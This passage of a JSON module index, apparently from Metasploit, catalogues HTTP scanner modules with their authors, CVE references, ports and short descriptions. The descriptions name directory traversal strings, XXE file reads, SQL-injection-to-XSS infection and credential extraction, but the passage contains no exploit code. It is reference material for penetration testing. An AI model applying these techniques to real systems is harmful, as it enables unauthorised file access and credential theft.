"full_name": "auxiliary/scanner/http/kodi_traversal",
"rank": 300,
"disclosure_date": "2017-02-12",
"type": "auxiliary",
"author": [
"Eric Flokstra",
"jvoisin"
],
"description": "This module exploits a directory traversal flaw found in Kodi before 17.1.",
"references": [
"CVE-2017-5982"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/kodi_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/linknat_vos_traversal": {
"name": "Linknat Vos Manager Traversal",
"full_name": "auxiliary/scanner/http/linknat_vos_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to test whether a file traversal vulnerability\n is present in version of linknat vos2009/vos3000",
"references": [
"URL-http://www.linknat.com/",
"URL-http://www.wooyun.org/bugs/wooyun-2010-0145458"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linknat_vos_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/linksys_e1500_traversal": {
"name": "Linksys E1500 Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/linksys_e1500_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a directory traversal vulnerability which is present in\n different Linksys home routers, like the E1500.",
"references": [
"URL-http://www.s3cur1ty.de/m1adv2013-004",
"URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml",
"BID-57760",
"OSVDB-89911",
"EDB-24475"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linksys_e1500_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/litespeed_source_disclosure": {
"name": "LiteSpeed Source Code Disclosure/Download",
"full_name": "auxiliary/scanner/http/litespeed_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kingcope",
"xanda"
],
"description": "This module exploits a source code disclosure/download vulnerability in\n versions 4.0.14 and prior of LiteSpeed.",
"references": [
"CVE-2010-2333",
"OSVDB-65476",
"BID-40815",
"EDB-13850"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/litespeed_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/lucky_punch": {
"name": "HTTP Microsoft SQL Injection Table XSS Infection",
"full_name": "auxiliary/scanner/http/lucky_punch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module implements the mass SQL injection attack in\n use lately by concatenation of HTML string that forces a persistent\n XSS attack to redirect user browser to an attacker controller website.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
"is_install_path": true,
"ref_name": "scanner/http/lucky_punch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/majordomo2_directory_traversal": {
"name": "Majordomo2 _list_file_get() Directory Traversal",
"full_name": "auxiliary/scanner/http/majordomo2_directory_traversal",
"rank": 300,
"disclosure_date": "2011-03-08",
"type": "auxiliary",
"author": [
"Nikolas Sotiriu"
],
"description": "This module exploits a directory traversal vulnerability present in\n the _list_file_get() function of Majordomo2 (help function). By default, this\n module will attempt to download the Majordomo config.pl file.",
"references": [
"OSVDB-70762",
"CVE-2011-0049",
"CVE-2011-0063",
"URL-http://sotiriu.de/adv/NSOADV-2011-003.txt",
"EDB-16103"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/majordomo2_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_desktop_central_login": {
"name": "ManageEngine Desktop Central Login Utility",
"full_name": "auxiliary/scanner/http/manageengine_desktop_central_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to a ManageEngine Desktop Central.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_desktop_central_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_deviceexpert_traversal": {
"name": "ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal",
"full_name": "auxiliary/scanner/http/manageengine_deviceexpert_traversal",
"rank": 300,
"disclosure_date": "2012-03-18",
"type": "auxiliary",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in ManageEngine\n DeviceExpert's ScheduleResultViewer Servlet. This is done by using\n \"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\" in the path in order to retrieve a file on a\n vulnerable machine. Please note that the SSL option is required in order to send\n HTTP requests.",
"references": [
"OSVDB-80262"
],
"platform": "",
"arch": "",
"rport": 6060,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_deviceexpert_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_deviceexpert_user_creds": {
"name": "ManageEngine DeviceExpert User Credentials",
"full_name": "auxiliary/scanner/http/manageengine_deviceexpert_user_creds",
"rank": 300,
"disclosure_date": "2014-08-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module extracts usernames and salted MD5 password hashes\n from ManageEngine DeviceExpert version 5.9 build 5980 and prior.\n\n This module has been tested successfully on DeviceExpert\n version 5.9.7 build 5970.",
"references": [
"EDB-34449",
"OSVDB-110522",
"CVE-2014-5377"
],
"platform": "",
"arch": "",
"rport": 6060,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_securitymanager_traversal": {
"name": "ManageEngine SecurityManager Plus 5.5 Directory Traversal",
"full_name": "auxiliary/scanner/http/manageengine_securitymanager_traversal",
"rank": 300,
"disclosure_date": "2012-10-19",
"type": "auxiliary",
"author": [
"blkhtc0rp",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw found in ManageEngine\n SecurityManager Plus 5.5 or less. When handling a file download request,\n the DownloadServlet class fails to properly check the 'f' parameter, which\n can be abused to read any file outside the virtual directory.",
"references": [
"OSVDB-86563",
"EDB-22092"
],
"platform": "",
"arch": "",
"rport": 6262,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_securitymanager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mediawiki_svg_fileaccess": {
"name": "MediaWiki SVG XML Entity Expansion Remote File Access",
"full_name": "auxiliary/scanner/http/mediawiki_svg_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel Franke",
"juan vazquez <juan.vazquez@metasploit.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module attempts to read a remote file from the server using a vulnerability\n in the way MediaWiki handles SVG files. The vulnerability occurs while trying to\n expand external entities with the SYSTEM identifier. In order to work MediaWiki must\n be configured to accept upload of SVG files. If anonymous uploads are allowed the\n username and password aren't required, otherwise they are. This module has been\n tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10.\n Older versions were also tested but do not seem to be vulnerable to this vulnerability.\n The following MediaWiki requirements must be met: File upload must be enabled,\n $wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something\n other than 'false'.",
"references": [
"OSVDB-92490",
"URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=46859",
"URL-http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/mediawiki_svg_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/meteocontrol_weblog_extractadmin": {
"name": "Meteocontrol WEBlog Password Extractor",
"full_name": "auxiliary/scanner/http/meteocontrol_weblog_extractadmin",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01",
"CVE-2016-2296",
"CVE-2016-2298"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
"is_install_path": true,
"ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mod_negotiation_brute": {
"name": "Apache HTTPD mod_negotiation Filename Bruter",
"full_name": "auxiliary/scanner/http/mod_negotiation_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"diablohorn <diablohorn@gmail.com>"
],
"description": "This module performs a brute force attack in order to discover existing files on a\n server which uses mod_negotiation. If the filename is found, the IP address and the\n files found will be displayed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
"is_install_path": true,
"ref_name": "scanner/http/mod_negotiation_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mod_negotiation_scanner": {
"name": "Apache HTTPD mod_negotiation Scanner",
"full_name": "auxiliary/scanner/http/mod_negotiation_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"diablohorn <diablohorn@gmail.com>"
],
"description": "This module scans the webserver of the given host(s) for the existence of mod_negotiate.\n If the webserver has mod_negotiation enabled, the IP address will be displayed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/mod_negotiation_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ms09_020_webdav_unicode_bypass": {
"name": "MS09-020 IIS6 WebDAV Unicode Authentication Bypass",
"full_name": "auxiliary/scanner/http/ms09_020_webdav_unicode_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to to bypass authentication using the WebDAV IIS6\n Unicode vulnerability discovered by Kingcope. The vulnerability appears\n to be exploitable where WebDAV is enabled on the IIS6 server, and any\n protected folder requires either Basic, Digest or NTLM authentication.",
"references": [
"MSB-MS09-020",
"CVE-2009-1535",
"CVE-2009-1122",
"OSVDB-54555",
"BID-34993"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ms15_034_http_sys_memory_dump": {
"name": "MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure",
"full_name": "auxiliary/scanner/http/ms15_034_http_sys_memory_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft <rwhitcroft@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Sunny Neo <sunny.neo@centurioninfosec.sg>"
],
"description": "This module dumps memory contents using a crafted Range header and affects only\n Windows 8.1, Server 2012, and Server 2012R2. Note that if the target\n is running in VMware Workstation, this module has a high likelihood\n of resulting in BSOD; however, VMware ESX and non-virtualized hosts\n seem stable. Using a larger target file should result in more memory\n being dumped, and SSL seems to produce more data as well.",
"references": [
"CVE-2015-1635",
"MSB-MS15-034",
"URL-http://pastebin.com/ypURDPc4",
"URL-https://github.com/rapid7/metasploit-framework/pull/5150",
"URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection",
"URL-http://www.securitysift.com/an-analysis-of-ms15-034/",
"URL-http://securitysift.com/an-analysis-of-ms15-034/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-21 12:31:56 +0000",
"path": "/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/ms15_034_http_sys_memory_dump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mybook_live_login": {
"name": "Western Digital MyBook Live Login Utility",
"full_name": "auxiliary/scanner/http/mybook_live_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module simply attempts to login to a Western Digital MyBook Live instance using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/mybook_live_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/netdecision_traversal": {
"name": "NetDecision NOCVision Server Directory Traversal",
"full_name": "auxiliary/scanner/http/netdecision_traversal",
"rank": 300,
"disclosure_date": "2012-03-07",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in NetDecision's\n TrafficGrapherServer.exe service. This is done by using \"...\\\" in\n the path to retrieve a file on a vulnerable machine.",
"references": [
"CVE-2012-1465",
"OSVDB-79863",
"URL-http://aluigi.altervista.org/adv/netdecision_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 8087,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/netdecision_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/netgear_sph200d_traversal": {
"name": "Netgear SPH200D Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/netgear_sph200d_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a directory traversal vulnerablity which is present in\n Netgear SPH200D Skype telephone.",
"references": [
"BID-57660",
"EDB-24441",
"URL-http://support.netgear.com/product/SPH200D",
"URL-http://www.s3cur1ty.de/m1adv2013-002"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/netgear_sph200d_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/nginx_source_disclosure": {
"name": "Nginx Source Code Disclosure/Download",
"full_name": "auxiliary/scanner/http/nginx_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits a source code disclosure/download vulnerability in\n versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40\n correct this vulnerability.",
"references": [
"CVE-2010-2263",
"OSVDB-65531",
"BID-40760",
"EDB-13818",
"EDB-13822"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/nginx_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_file_reporter_fsfui_fileaccess": {
"name": "NFR Agent FSFUI Record Arbitrary Remote File Access",
"full_name": "auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n with an FSFUI record with UICMD 126. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).",
"references": [
"CVE-2012-4958",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_file_reporter_srs_fileaccess": {
"name": "NFR Agent SRS Record Arbitrary Remote File Access",
"full_name": "auxiliary/scanner/http/novell_file_reporter_srs_fileaccess",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n CMD 103, specifying a full pathname. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).",
"references": [
"CVE-2012-4957",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
3037
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_mdm_creds": {
"name": "Novell Zenworks Mobile Device Managment Admin Credentials",
"full_name": "auxiliary/scanner/http/novell_mdm_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"steponequit",
"Andrea Micalizzi (aka rgod)"
],
"description": "This module attempts to pull the administrator credentials from\n a vulnerable Novell Zenworks MDM server.",
"references": [
"CVE-2013-1081",
"OSVDB-91119",
"URL-http://www.novell.com/support/kb/doc.php?id=7011895"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_mdm_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ntlm_info_enumeration": {
"name": "Host Information Enumeration via NTLM Authentication",
"full_name": "auxiliary/scanner/http/ntlm_info_enumeration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Knight"
],
"description": "This module makes requests to resources on the target server in\n an attempt to find resources which permit NTLM authentication. For\n resources which permit NTLM authentication, a blank NTLM type 1 message\n is sent to enumerate a type 2 message from the target server. The type\n 2 message is then parsed for information such as the Active Directory\n domain and NetBIOS name. A single URI can be specified with TARGET_URI\n and/or a file of URIs can be specified with TARGET_URIS_FILE (default).",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
"is_install_path": true,
"ref_name": "scanner/http/ntlm_info_enumeration",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/octopusdeploy_login": {
"name": "Octopus Deploy Login Utility",
"full_name": "auxiliary/scanner/http/octopusdeploy_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module simply attempts to login to an Octopus Deploy server using a specific\n username and password. It has been confirmed to work on version 3.4.4",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/octopusdeploy_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/open_proxy": {
"name": "HTTP Open Proxy Detection",
"full_name": "auxiliary/scanner/http/open_proxy",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Checks if an HTTP proxy is open. False positive are avoided\n verifying the HTTP return code and matching a pattern.\n The CONNECT method is verified only the return code.\n HTTP headers are shown regarding the use of proxy or load balancer.",
"references": [
"URL-http://en.wikipedia.org/wiki/Open_proxy",
"URL-http://nmap.org/svn/scripts/http-open-proxy.nse"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/open_proxy.rb",
"is_install_path": true,
"ref_name": "scanner/http/open_proxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/openmind_messageos_login": {
"name": "OpenMind Message-OS Portal Login Brute Force Utility",
"full_name": "auxiliary/scanner/http/openmind_messageos_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for OpenMind Message-OS provisioning web login portal, and\n performs a login brute force attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/openmind_messageos_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/options": {
"name": "HTTP Options Detection",
"full_name": "auxiliary/scanner/http/options",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Display available HTTP options for each system",
"references": [
"CVE-2005-3398",
"CVE-2005-3498",
"OSVDB-877",
"BID-11604",
"BID-9506",
"BID-9561"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/options.rb",
"is_install_path": true,
"ref_name": "scanner/http/options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/oracle_demantra_database_credentials_leak": {
"name": "Oracle Demantra Database Credentials Leak",
"full_name": "auxiliary/scanner/http/oracle_demantra_database_credentials_leak",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Oliver Gruskovnjak"
],
"description": "This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in\n combination with an authentication bypass. This way an unauthenticated user can retrieve\n the database name, username and password on any vulnerable machine.",
"references": [
"CVE-2013-5795",
"CVE-2013-5880",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
"is_install_path": true,
"ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
